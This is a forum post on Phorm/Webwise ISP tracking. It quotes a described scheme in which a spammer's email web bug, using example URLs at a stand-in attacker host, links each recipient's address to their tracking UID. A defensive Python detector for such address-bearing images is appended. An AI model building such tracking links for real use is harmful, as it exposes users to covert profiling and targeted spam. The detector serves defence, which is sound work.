Re: Virgin Media Phorm Webwise Adverts [Updated: See Post No. 1, 77, 102 & 797]
Another exploit found in phorm http://www.ispreview.co.uk/talk/show...3&postcount=21
Quote:
posted by Mel on ISPreview.
Do any modern email clients still share cookies with a browser? Hmm, I guess webmail services.
Only it occurred to me that by spamming 'everybody'@a_phorming_isp.com with an html email that contained a webbug designed to capture the UID, it might be possible for a spammer to compile a database of UIDs linked to email addresses.
The webbug could be an http: image link containing the email address it was sent to (i.e. your email address), suitably escaped, e.g.:
http://somespammer.con/uidcaptureYourEmailAddress.jpg
If you view the email your client would request the image,
phorm would use its triple redirect jiggery-pokery to intercept this request and copy the webwise.net UID to a webwise cookie in somespammer's domain.
The spammer's server would reply with a redirect to an https: php script, e.g.
https://somespammer.con/uidcaptureYourEmailAddress.php
The client automatically requests the https: url sending the webwise UID cookie.
Using https: bypasses phorm's intercept of the UID cookie, delivering the UID and email address to the spammer.
The spammer then sells a service to websites that allows them to email targeted spam to visitors to their website.
__________________
I'm enjoying Aquiss. Are you? Now happily surfing the internet phorm phree long may my surfing be phree of spyware.
Nice one. Good luck all. No need to hang around, no longer cable customer.
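A defensive check for the web bug pattern described in the quoted post, as an added example that is not part of the original thread: it flags remote images in an HTML email whose URL embeds the recipient's own address, which is the signal that viewing the message would tie that address to whatever cookies accompany the image request. The sample message, host names and function names are constructed for illustration.

```python
import email
import re
from email import policy
from html.parser import HTMLParser
from urllib.parse import unquote, urlsplit

# Constructed sample: one address-bearing web bug, one ordinary remote image,
# one inline (cid:) image that never touches the network.
SAMPLE = """\
From: offers@sender.example
To: alice@isp.example
Subject: hello
MIME-Version: 1.0
Content-Type: text/html; charset="utf-8"

<html><body>
<img src="http://tracker.example/uidcapture-alice%40isp.example.jpg" width="1" height="1">
<img src="http://cdn.example/logo.png">
<img src="cid:inline1">
</body></html>
"""

class _ImgCollector(HTMLParser):
    """Collects the src attribute of every <img> tag."""
    def __init__(self):
        super().__init__()
        self.srcs = []
    def handle_starttag(self, tag, attrs):
        if tag == "img":
            self.srcs.extend(v for k, v in attrs if k == "src" and v)

def _squash(text):
    # Heuristic normalisation: lowercase, keep only letters and digits, so
    # "alice%40isp.example" and "alice-isp-example" compare equal.
    # It will not catch hashed or base64-encoded addresses.
    return re.sub(r"[^a-z0-9]", "", text.lower())

def address_bearing_images(raw_message):
    """Return remote image URLs that embed one of the To: addresses."""
    msg = email.message_from_string(raw_message, policy=policy.default)
    keys = {_squash(a.addr_spec) for a in msg["To"].addresses} if msg["To"] else set()
    hits = []
    for part in msg.walk():
        if part.get_content_type() != "text/html":
            continue
        collector = _ImgCollector()
        collector.feed(part.get_content())
        for src in collector.srcs:
            if urlsplit(src).scheme.lower() in ("http", "https") and \
               any(k and k in _squash(unquote(src)) for k in keys):
                hits.append(src)
    return hits
```

A mail filter or client can use a non-empty result as a reason to keep remote content blocked for that message.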